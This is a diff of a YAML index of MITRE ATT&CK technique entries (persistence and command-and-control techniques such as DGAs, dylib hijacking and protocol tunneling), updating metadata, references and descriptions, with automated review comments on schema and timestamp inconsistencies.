- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
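Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root) is removed from T1505.001 and not re-added anywhere in this hunk; the same field (User) is dropped from T1568.002 later in the patch. If the index or any test-selection tooling filters on required permissions, that is a behaviour change rather than a cosmetic reorder and deserves a line in the commit message. The rest is consistent: `x_mitre_version` goes 1.0 to 1.1, `x_mitre_attack_spec_version` goes 2.1.0 to 3.2.0, the two NetSPI references move to new netspi.com paths with 'Retrieved September 12, 2024' dates, and the `x_mitre_detection` citation still resolves because the `source_name` 'NetSPI Startup Stored Procedures' is unchanged.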
@@ -36014,7 +36446,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36038,12 +36470,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
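Review bot: here both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1556.004 with no replacement `x_mitre_attack_spec_version` visible in the hunk, unlike T1505.001 above where the field is re-added at 3.2.0 in a later position. The same two-line removal appears for T1574.012, T1568.001 and T1572. Verify that the field is re-emitted elsewhere in those objects, outside the three lines of context shown, rather than dropped; if it is dropped, those entries no longer state which ATT&CK spec version they conform to while neighbouring entries do.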
@@ -36127,11 +36557,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36183,9 +36612,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36234,7 +36662,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36272,14 +36700,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36342,7 +36768,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -36400,97 +36825,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
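Review bot: the 'Akamai DGA Mitigation' reference URL changes from a blogs.akamai.com post to a medium.com/@yvyuz post. If that mirrors upstream ATT&CK it is fine to carry, but a vendor blog citation turning into a personal Medium link is worth checking (and archiving) because it is one of the references behind the time-based and seeded DGA claims in the description. Otherwise this hunk is mostly key reordering, as with T1505.001; the substantive edits are the `modified` date, `x_mitre_version` 1.0 to 1.1, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the added `revoked`/`x_mitre_deprecated` flags, and the removal of `x_mitre_permissions_required`.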
@@ -36556,9 +36979,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
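Review bot: the new T1071.005 entry carries `x_mitre_detection: ''`, an empty string, where every other technique in this patch has detection text. If the index renders that field, an empty string produces a blank Detection section; either have the generator omit empty values or confirm the renderer handles them. Two smaller points: the `securityintelligence.com` URL slug reads 'misues', so check that the link resolves before treating it as an upstream typo, and the description's protocol names (MQTT, XMPP, AMQP, STOMP) are split across lines in the quoted string, which is harmless in YAML but suggests the generator is wrapping inside inline code spans.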
@@ -36604,7 +37085,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -36636,7 +37116,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -36658,22 +37138,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -36695,7 +37173,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -36720,7 +37198,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -36804,7 +37281,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -36868,11 +37344,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -36956,7 +37431,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -36987,7 +37461,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37007,8 +37481,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
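Review bot: the link text here becomes 'Protocol or Service Impersonation', matching the T1001.003 rename lower in this patch, yet the hunk directly above moves T1572's `modified` back from 2021-04-29 to 2020-03-27. An object whose description already reflects the rename cannot honestly carry a 2020 last-modified time, so either the description and the `modified` value are being taken from different sources, or the `modified` field in the new source is not reliable. Either way, nothing downstream should use `modified` from this file for change detection until that is resolved.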
@@ -37030,8 +37504,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
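Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed for T1572 with no replacement line in the hunk, whereas other objects in this patch keep or gain `x_mitre_attack_spec_version: 3.2.0` (T1102 and T1001.003 below). The same double removal happens for exactly the objects whose `modified` timestamps regressed (T1090, T1568, T1568.003, T1104, T1205.001, T1102.003, T1102.002, T1132.002, T1001.002, T1008, T1102.001), which is consistent with those objects now coming from an export that predates the attack spec version field. Confirm the key does not appear elsewhere in these objects; if it is genuinely gone, any consumer that reads `x_mitre_attack_spec_version` will now hit a missing key for roughly a dozen techniques.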
@@ -37093,7 +37565,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37141,7 +37612,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37195,7 +37665,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37228,7 +37697,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
